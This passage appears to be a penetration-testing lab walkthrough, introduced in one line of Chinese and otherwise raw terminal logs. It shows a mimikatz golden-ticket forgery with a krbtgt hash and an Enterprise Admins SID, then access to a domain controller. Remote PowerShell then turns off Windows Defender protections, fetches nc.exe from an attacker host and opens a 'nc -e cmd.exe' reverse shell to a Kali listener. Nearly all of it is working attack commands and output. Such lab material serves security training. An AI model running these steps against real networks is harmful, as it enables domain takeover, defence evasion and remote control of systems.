接172.16.243.180生成的黄金票据,可以对192进行访问:
c:\\Users\\Administrator\\Desktop>**mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"**
mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt
User : Administrator
Domain : final.com (FINAL)
SID : S-1-5-21-1725955968-4040474791-670206374
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1725955968-4040474791-670206374-519 ;
ServiceKey: 405854caaf49b41e0e585369a001f114 - rc4_hmac_nt
Lifetime : 8/4/2022 2:41:33 AM ; 8/1/2032 2:41:33 AM ; 8/1/2032 2:41:33 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ final.com' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop>more \\\\dc02.dev.final.com\\c$\\users\\administrator\\desktop\\proof.txt
more \\\\dc02.dev.final.com\\c$\\users\\administrator\\desktop\\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2
S C:\\Users\\Administrator\\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
final\\administrator
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.192
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
dc02
PS C:\\Users\\Administrator\\Desktop> **Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}**
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
PS C:\\Users\\Administrator\\Desktop> **Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri <http://192.168.49.243/nc.exe> -o c:\\Users\\Administrator\\Desktop\\nc.exe}**
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri <http://192.168.49.243/nc.exe> -o c:\\Users\\Administrator\\Desktop\\nc.exe}
PS C:\\Users\\Administrator\\Desktop> **Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\\Users\\Administrator\\Desktop\\nc.exe 192.168.49.243 80 -e cmd.exe}**
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\\Users\\Administrator\\Desktop\\nc.exe 192.168.49.243 80 -e cmd.exe}
┌──(kali㉿kali)-[/usr/share/windows-binaries]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63152
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Users\\Administrator.FINAL\\Documents>hostname
hostname
dc02
C:\\Users\\Administrator.FINAL\\Documents>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.192
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
C:\\Users\\Administrator.FINAL\\Documents>whoami
whoami
final\\administrator
C:\\Users\\Administrator.FINAL\\Documents>
C:\\Users\\Administrator.FINAL\\Documents>more c:\\Users\\Administrator\\Desktop\\proof.txt
more c:\\Users\\Administrator\\Desktop\\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2
C:\\Users\\Administrator.FINAL\\Documents>